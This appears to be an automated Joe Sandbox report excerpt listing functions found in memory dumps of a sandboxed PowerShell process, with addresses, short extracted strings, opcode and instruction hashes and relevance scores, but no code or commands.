Instruction ID: f301a5c0e504687cc1cd83a0717055f0c91466b122c10a4d663f53766c6dad4f
Opcode Fuzzy Hash: e4fd6707335ff4d24856964123c34e1dcec14439e58a8280190d22327b286844
Instruction Fuzzy Hash: 8B728EB0A00219DFDB34DB58CD51B6EB7B2AF85300F1089A9D819AB754DB31ED85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07045478 Relevance: 5.8, Strings: 4, Instructions: 804COMMON

Download Yara Rule

Strings

-xk, xrefs: 070453DF
4'^q, xrefs: 0704504D
x.xk, xrefs: 07045391
tLyk, xrefs: 070458E0

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tLyk$x.xk$-xk
API String ID: 0-2287037694
Opcode ID: d4cd92fa9e3ca6feddc2bfb24d625bf5bfcf36301cfad8a15fd8adace4e86c27
Instruction ID: 4d0abdae596f9cca898611d42d04201102db74a181cd7b3913664b9ff5121a9d
Opcode Fuzzy Hash: d4cd92fa9e3ca6feddc2bfb24d625bf5bfcf36301cfad8a15fd8adace4e86c27
Instruction Fuzzy Hash: 517291B0A00214DFDB34DB58CD51B6EB7B2AF85300F50C9A9D91AAB750DB31AD85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07047E08 Relevance: 5.6, Strings: 4, Instructions: 599COMMON

Download Yara Rule

Strings

4'^q, xrefs: 070482E0
4'^q, xrefs: 07048146
4'^q, xrefs: 07048150
4'^q, xrefs: 070482D6

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q
API String ID: 0-1420252700
Opcode ID: 9f17e37fb6523dd46a96e6fdfb38a2f692fe42a18167cf710430c53cbcbd16a1
Instruction ID: 70b9f5302844ef51f245e0ddd6a743bf465a25412a20077c132f4bded1072f94
Opcode Fuzzy Hash: 9f17e37fb6523dd46a96e6fdfb38a2f692fe42a18167cf710430c53cbcbd16a1
Instruction Fuzzy Hash: F01239F1B042059FCB259A68D91076EBBE2AFC6310F14C9BAD905CB391EB32DC45C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 069C1E96 Relevance: 5.1, Strings: 4, Instructions: 72COMMON

Download Yara Rule

Strings

$^q, xrefs: 069C1EC3
4'^q, xrefs: 069C1EEB
$^q, xrefs: 069C1EB7
4'^q, xrefs: 069C1EDF

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: d30d5282f921488dc64c3fec263705cf7306ddbd7220d97e929eb8b6ea1b5486
Instruction ID: a3cfa1c6908f98db2192b34f4879240d22e2986ea076d8b2f5405359a6358194
Opcode Fuzzy Hash: d30d5282f921488dc64c3fec263705cf7306ddbd7220d97e929eb8b6ea1b5486
Instruction Fuzzy Hash: 1B110A32F042058EDB659669A8501BAF7D5EB85230F20887FC555CBE87DF32C849C397

Uniqueness

Uniqueness Score: -1.00%

Function 070447DA Relevance: 4.5, Strings: 3, Instructions: 742COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07045391
4'^q, xrefs: 0704504D
-xk, xrefs: 070453DF

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.xk$-xk
API String ID: 0-895538716
Opcode ID: 03b799d5ad9135acad29a165a83bde50a6bbb50ee0c6a98260385eb0c343a458
Instruction ID: 99f36e1d592375756295146ee6a936cbd58ca5b02be18293ec17884449fa5d36
Opcode Fuzzy Hash: 03b799d5ad9135acad29a165a83bde50a6bbb50ee0c6a98260385eb0c343a458
Instruction Fuzzy Hash: 83628EB0A00215DFDB34DB58CD51B9EB7B2BF85304F1086AAD81A6B750DB31AD85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 07045633 Relevance: 4.3, Strings: 3, Instructions: 560COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07045391
4'^q, xrefs: 0704504D
-xk, xrefs: 070453DF

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.xk$-xk
API String ID: 0-895538716
Opcode ID: a69426b73d53c2e2155fd41b0e1716e6633294c6ba08be80ab3586e084ad6569
Instruction ID: 686b88af20de0bdd3deaab19d65283b9e150c9b9cd5d3514546d8fa7ea1582db
Opcode Fuzzy Hash: a69426b73d53c2e2155fd41b0e1716e6633294c6ba08be80ab3586e084ad6569
Instruction Fuzzy Hash: BE32AFB0A00214DFDB34DB58CD51BAEB7B2BF84300F5089A9D91A6B750DB31AD85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0704C91C Relevance: 4.3, Strings: 3, Instructions: 537COMMON

Download Yara Rule

Strings

-xk, xrefs: 0704C6B8
4'^q, xrefs: 0704C360
x.xk, xrefs: 0704C667

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$x.xk$-xk
API String ID: 0-895538716
Opcode ID: 87159d93df70b205627bdf906bbafe5108d447eb34b4770d26b9e0fe1bea7ed9
Instruction ID: 0f46ac8eb170e977eb460d7a854e13b686d7f4c7bac4e94db0a763bd47499c10
Opcode Fuzzy Hash: 87159d93df70b205627bdf906bbafe5108d447eb34b4770d26b9e0fe1bea7ed9
Instruction Fuzzy Hash: 703281B4A002189FDB74DB54CD51B9EB7B2AB84304F10C9A9D81A6F751CB31ED82CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0435B910 Relevance: 4.3, Strings: 3, Instructions: 527COMMON

Download Yara Rule

Strings

Hbq, xrefs: 0435B9D6
$^q, xrefs: 0435BE8F
$^q, xrefs: 0435BB2A

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID: Hbq$$^q$$^q
API String ID: 0-1611274095
Opcode ID: 96a9d3fd4b10a7dcfb62ff2b097844ad241bcde2f795e287a7208b9093164ce8
Instruction ID: 68600aa122e738c37e0d1b9c3beb4566ff36792bb7e113ce79cbe9b14d038cb5
Opcode Fuzzy Hash: 96a9d3fd4b10a7dcfb62ff2b097844ad241bcde2f795e287a7208b9093164ce8
Instruction Fuzzy Hash: D6224234B002149FCB25DF24D855BADBBB2AF89304F1494A9D80AAB365DF35ED85CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0704CBB0 Relevance: 4.2, Strings: 3, Instructions: 435COMMON

Download Yara Rule

Strings

tLyk, xrefs: 0704CD9E
x.xk, xrefs: 0704D359
4'^q, xrefs: 0704CE25

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tLyk$x.xk
API String ID: 0-1555912231
Opcode ID: 84c9de636d1dded74a3dc99ab920df7a7c41c0afbe4be87448076266db6bfe3c
Instruction ID: 252519dfe9ed9992d57bce735913b24961fccbf880bb19e4ccbcff70ed3d1c02
Opcode Fuzzy Hash: 84c9de636d1dded74a3dc99ab920df7a7c41c0afbe4be87448076266db6bfe3c
Instruction Fuzzy Hash: EC123BF0A01215DFEB70DB24C950BAEB7F2BB85304F0085A9D95AAB751DB31AD81CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0704C9A5 Relevance: 4.2, Strings: 3, Instructions: 431COMMON

Download Yara Rule

Strings

tLyk, xrefs: 0704CD9E
x.xk, xrefs: 0704D359
4'^q, xrefs: 0704CE25

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tLyk$x.xk
API String ID: 0-1555912231
Opcode ID: 99fe06517205a4ac4ff4139467f3f904120cd4766da2b94f42c92220dc0e89b8
Instruction ID: e8598f2524f02fc02c3da4ad438ea5a86abb53698e2a5e2da47542a4fd7fceeb
Opcode Fuzzy Hash: 99fe06517205a4ac4ff4139467f3f904120cd4766da2b94f42c92220dc0e89b8
Instruction Fuzzy Hash: 4C1228F0A01215DFEB70DB14C950BAEB7F2BB85304F0085A9E91AAB750DB31AD85CF61

Uniqueness

Uniqueness Score: -1.00%

Function 07041518 Relevance: 3.8, Strings: 3, Instructions: 94COMMON

Download Yara Rule

Strings

$^q, xrefs: 07041580
$^q, xrefs: 0704152A
$^q, xrefs: 07041574

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 673b1c16f58c1a798313ffc1d4dce692bfbb63dbbfcef8ee082c10d8dc8d7a68
Instruction ID: 7ea8c0740a901df9906e45e20c411de6f126f24bc3da186c7290e043fecd3178
Opcode Fuzzy Hash: 673b1c16f58c1a798313ffc1d4dce692bfbb63dbbfcef8ee082c10d8dc8d7a68
Instruction Fuzzy Hash: 34216BF170030EEBDB74576E9910BA7A6D65BC0750F248A3AA40ACB385DD32D8848361

Uniqueness

Uniqueness Score: -1.00%

Function 070414F8 Relevance: 2.6, Strings: 2, Instructions: 81COMMON

Download Yara Rule

Strings

$^q, xrefs: 0704152A
$^q, xrefs: 07041574

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 9501f4c86dfc8608c022d7cdf829c16cc1f2a51674f8485fa0922518378a3728
Instruction ID: 9abce7e0073002e2c2eb30943797be7ebea11d19d33b6a5ea9709739615ea92c
Opcode Fuzzy Hash: 9501f4c86dfc8608c022d7cdf829c16cc1f2a51674f8485fa0922518378a3728
Instruction Fuzzy Hash: 352129F170838DABDB2207298D117E67FF54B82650F1886B7E845CF297E9259888C762

Uniqueness

Uniqueness Score: -1.00%

Function 07041B0E Relevance: 1.7, Strings: 1, Instructions: 422COMMON

Download Yara Rule

Strings

h2zk, xrefs: 07041B6A

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: h2zk
API String ID: 0-4152957090
Opcode ID: 731b16cd2f340d129ba1584ccf1ff4338a97dbd6ca11795f3a3f4f8b1daa8c3a
Instruction ID: 9deecf72d9fd85e5552c151cbd10ea4ca2e80204922d1de5e3d2b92152efaa49
Opcode Fuzzy Hash: 731b16cd2f340d129ba1584ccf1ff4338a97dbd6ca11795f3a3f4f8b1daa8c3a
Instruction Fuzzy Hash: 6B025CF4B002099FDB64CB58C950EA9BBF2FB85314F15C669E815AB751CB32EC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 07043968 Relevance: 1.4, Strings: 1, Instructions: 102COMMON

Download Yara Rule

Strings

x.xk, xrefs: 07043A1A

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID: x.xk
API String ID: 0-2157606827
Opcode ID: 9850b5eaa98acd3ea873f562e84ab6a970dbfe76e5086e56255ac42e082f8ed5
Instruction ID: 97b5ace008205bb729f18fbd82eeccc716ea02d3b1d7c6d0c1ce30856e504a75
Opcode Fuzzy Hash: 9850b5eaa98acd3ea873f562e84ab6a970dbfe76e5086e56255ac42e082f8ed5
Instruction Fuzzy Hash: FA31C8B0740104AFD724A768C955FAEBAA3AFC4314F24C434E9016F7A5CFB69D458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 069C0258 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

4'^q, xrefs: 069C036A

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: f6caa63d4596c9e607e210b67e63f09f043757698869ac1c09bddfd6b90bcbf0
Instruction ID: cbe72446271cd01679e3229fe5d0e70c1b373669a22e921bf0dc772eea394737
Opcode Fuzzy Hash: f6caa63d4596c9e607e210b67e63f09f043757698869ac1c09bddfd6b90bcbf0
Instruction Fuzzy Hash: 4B21D170F01204DBDFB04A648501B7E7AE9AB80660F64456DD905DBB91EB3BD981CBE3

Uniqueness

Uniqueness Score: -1.00%

Function 07043B20 Relevance: .7, Instructions: 680COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a466d4434874e505bae86ba9970ad97701b40b98ba247a9e888aa22b1d7151
Instruction ID: be9fafb36b647184514d6fe6102f157d445c638ff1f649ddadf7f454c20c8b9f
Opcode Fuzzy Hash: c5a466d4434874e505bae86ba9970ad97701b40b98ba247a9e888aa22b1d7151
Instruction Fuzzy Hash: 32525AB4A00208DFCB64CB98C545B6EBBF2EF85304F64C669E905AF755CB72EC458B81

Uniqueness

Uniqueness Score: -1.00%

Function 07043AFE Relevance: .5, Instructions: 511COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adb74b350cb3e369220f22e101e79a6b4120c0da94d236cea7df95b789103cd2
Instruction ID: a9e74a46d635d46631bcb370ab8d3e875c9f6a27ae8cfc26583fcf826fa63b5e
Opcode Fuzzy Hash: adb74b350cb3e369220f22e101e79a6b4120c0da94d236cea7df95b789103cd2
Instruction Fuzzy Hash: 45225AB4A00205DFCB64CB98C540EADBBB2FF85314F55C669E915AB762CB72EC41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 07041640 Relevance: .5, Instructions: 478COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bfbad4fa69758f29e29d767b15276fd77c7e54c0c9f6f33a15ae580c54f64459
Instruction ID: 5bfae9a296521f7e529007560a6c967cdf23c92621a8fb5269ecefa61954c2b6
Opcode Fuzzy Hash: bfbad4fa69758f29e29d767b15276fd77c7e54c0c9f6f33a15ae580c54f64459
Instruction Fuzzy Hash: 041280F0B002099FC764CB58C950AA9BBF2BF89314F15C669E8159F755CB32EC85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0704419C Relevance: .5, Instructions: 465COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea99fccfb89e713e81b6f6e65be81cbccfdeeb68fbfd5c26113d43d83ffc95f3
Instruction ID: 86026fc4af42cee1c9bdcbd693607029cf59ff86ab85773c0eaead64f8148a40
Opcode Fuzzy Hash: ea99fccfb89e713e81b6f6e65be81cbccfdeeb68fbfd5c26113d43d83ffc95f3
Instruction Fuzzy Hash: DF1236F4A00205DFCB64CB88C545B6DBBB2EF85314F64C669E919AB761CB72EC41CB81

Uniqueness

Uniqueness Score: -1.00%

Function 07041624 Relevance: .4, Instructions: 400COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5fef46c6b41f67945d8850556e4c3f58da21ba25cdceadd4df4da60b8cb3a31
Instruction ID: e10930b2be4447c33eb709e20630d4ea0b202233a1bc83d1f941b407afac3827
Opcode Fuzzy Hash: e5fef46c6b41f67945d8850556e4c3f58da21ba25cdceadd4df4da60b8cb3a31
Instruction Fuzzy Hash: CBF11BF4A002099FDB64CB58C950E99BBF2BF89314F15C669E815AB751C732EC81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0435ADE0 Relevance: .4, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54a226605de4c7914a2268adb2aae77ae4caca9b1476d5545518d60cdee62707
Instruction ID: 3012a0ff0721ed4a3b2168b2c8053ac0a5bc2909dd2eee405db76844f9346703
Opcode Fuzzy Hash: 54a226605de4c7914a2268adb2aae77ae4caca9b1476d5545518d60cdee62707
Instruction Fuzzy Hash: 7DE1E674A002099FCB15DFA8D984E9DFBB2FF88310F258559E815AB365D731ED82CB90

Uniqueness

Uniqueness Score: -1.00%

Function 043572A0 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b56cd058ab868cf2dcce61ace97fd7b157a4d37f3c8a3aaedea11422f3f59b09
Instruction ID: d0e26d2e2267ecad283213826d758d9ca17e8434fbc0b167b130d2aa98a125de
Opcode Fuzzy Hash: b56cd058ab868cf2dcce61ace97fd7b157a4d37f3c8a3aaedea11422f3f59b09
Instruction Fuzzy Hash: 16C19D35A00248DFDB14DFA8D944EADBBB2FF84310F158569E806AB365DB34ED49CB80

Uniqueness

Uniqueness Score: -1.00%

Function 0435F8C4 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f71740424bd95f779e9aca10f388b3bead115e63d2bf91b7cd8c7b8dd9b1459f
Instruction ID: 2a821a45ddc00a03210162c6884f0fcccb6681fba3c292d6ad49b4ee45db0e29
Opcode Fuzzy Hash: f71740424bd95f779e9aca10f388b3bead115e63d2bf91b7cd8c7b8dd9b1459f
Instruction Fuzzy Hash: 7BB17E71E00609DFDF10CFA8D991B9DBBF2AF48318F149529D814E7264EB74A886CF81

Uniqueness

Uniqueness Score: -1.00%

Function 0435EFF4 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2658b39439c5e191ee9cd151602bae65166d0fd0dfb1da5a6434ffab364a7a
Instruction ID: d57ff51d453e374a1415e2a255d6aa47bd5c8e2f689971e12b033d81e5d22b9c
Opcode Fuzzy Hash: 7c2658b39439c5e191ee9cd151602bae65166d0fd0dfb1da5a6434ffab364a7a
Instruction Fuzzy Hash: A0B16D70E00209DFDB10DFA9D985BDDBBF2BF48314F149529D814A7264EB34A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 07045CB0 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 574e42235bbb5eda54d4df124e81700ed4316f9d101f4e9556a4b4da3875a56f
Instruction ID: 2e484c393a162ee5f2882688da56d82df91733b32e8172f18841a69389a7bbda
Opcode Fuzzy Hash: 574e42235bbb5eda54d4df124e81700ed4316f9d101f4e9556a4b4da3875a56f
Instruction Fuzzy Hash: 05916EF0A00205DFCB28CB98CA45A9EBBF2AF89314F148579E8156F751DB32DC55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07045C90 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4641b77688898db00ab890568f1cd4e66e08b709c8830413fd2a6f6fb77ced6
Instruction ID: 17381c3c714ef0fa064ec726a60001b6bed80cda8ee88c77affe90185c166607
Opcode Fuzzy Hash: e4641b77688898db00ab890568f1cd4e66e08b709c8830413fd2a6f6fb77ced6
Instruction Fuzzy Hash: 56918FF0A00205DFCB24CB98C945B9EBBF2BF89314F158669E8156B752C732EC55CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 069C05A4 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3486718316.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_69c0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d673bf702ebf26dc4bf3f2936773b2e23cebc894bbffb1dec62d6affbfeab763
Instruction ID: 3af1de5ccf5e1e3aec52a5ed39cf6669818c73e97236fa6c2175bb77cc26e944
Opcode Fuzzy Hash: d673bf702ebf26dc4bf3f2936773b2e23cebc894bbffb1dec62d6affbfeab763
Instruction Fuzzy Hash: C3811974A00204DFDB64CF58C590E99BBB6AF88324F25C569E905ABB51CB36EC41CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 04357A68 Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 836406536d5139a9f11f99d956f4c11d048b8f956a0852e1e040f55f5469cece
Instruction ID: 1730b8c05677836abb9a2d9a582d1f53ece4bb61b24457da84334f1b940ebef2
Opcode Fuzzy Hash: 836406536d5139a9f11f99d956f4c11d048b8f956a0852e1e040f55f5469cece
Instruction Fuzzy Hash: 7B717B30A00219CFCB14DF69C884A9DFBF6FF89314F14856AE8199B761DB71AC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04357BD6 Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05890fda53d4fc5e03dce5c19ea6442e9233edb6b5154fb2936575d14e270e87
Instruction ID: f9298c2ecc987fbbe63dbbac9057e7e88017402b2bed8091f2f2d06cbbc96d94
Opcode Fuzzy Hash: 05890fda53d4fc5e03dce5c19ea6442e9233edb6b5154fb2936575d14e270e87
Instruction Fuzzy Hash: 85714A70E00608DFDB14DFA5D854BADBBF2BF88304F148429D812AB7A0DB35AD4ACB51

Uniqueness

Uniqueness Score: -1.00%

Function 07047DEC Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a88866740d2c539c9f4481947e4774739beae8931c1f0778638985e18ef08e63
Instruction ID: 0a74f01f825be42db73a5cc800185d8e6fa6233c88ca2f1ae1b8fdf0ea1b9bee
Opcode Fuzzy Hash: a88866740d2c539c9f4481947e4774739beae8931c1f0778638985e18ef08e63
Instruction Fuzzy Hash: C5412BF07142029FCB718A258A15A6A7BE2AF85204F1857B9E801DF355D732DC45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 07041048 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3487939917.0000000007040000.00000040.00000800.00020000.00000000.sdmp, Offset: 07040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7040000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98fe92d5197375163d75f6f77aabbdf29e3e409f25ff31c073ca5c7b5922c0dc
Instruction ID: da68bc65c9d58c82bbdd8e5b556c0b260bea7df139e83d7b0897161040f8ee60
Opcode Fuzzy Hash: 98fe92d5197375163d75f6f77aabbdf29e3e409f25ff31c073ca5c7b5922c0dc
Instruction Fuzzy Hash: C64109F1B002199BCB54AFB9D9406AEB7E5AFC4310F248A3AD815DB351DA32DD85C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 043577F9 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81d1806595075ec2110f42bbe496f77736874d47a64cff3ab3eba719b5327aea
Instruction ID: ac0c14ff2418fd85ecca16aeae1c4c3a7ac440f76f260e52fd2c9bd379deee25
Opcode Fuzzy Hash: 81d1806595075ec2110f42bbe496f77736874d47a64cff3ab3eba719b5327aea
Instruction Fuzzy Hash: 3D419B30A00214CFDB159B74C958AADBBB6EF89754F189469E806EB7B0DB35AC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04357A53 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e013968fb7f5df2d41493c7c9dd1564151c100ad0e4dc5d2eb71013e5c37c5c2
Instruction ID: ad571d03c2a673fb37d056b05caa37ac217ad56957e76d2cc0cf764bf4da68ad
Opcode Fuzzy Hash: e013968fb7f5df2d41493c7c9dd1564151c100ad0e4dc5d2eb71013e5c37c5c2
Instruction Fuzzy Hash: E2415970A00218CFDB18DFA9C845BEDBBF2BF88344F148569D406AB7A5DB71AD45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04352BB9 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3483280163.0000000004350000.00000040.00000800.00020000.00000000.sdmp, Offset: 04350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_4350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fb0a20944eae9679a0046fbfae80bfa2b4ee2a9bc06aba023e05935ba64ccf9
Instruction ID: be6d00a2b4239d96f50dd863a83ad60cee0d1f13dbe8fb4b31aeb8f7b0617ab0
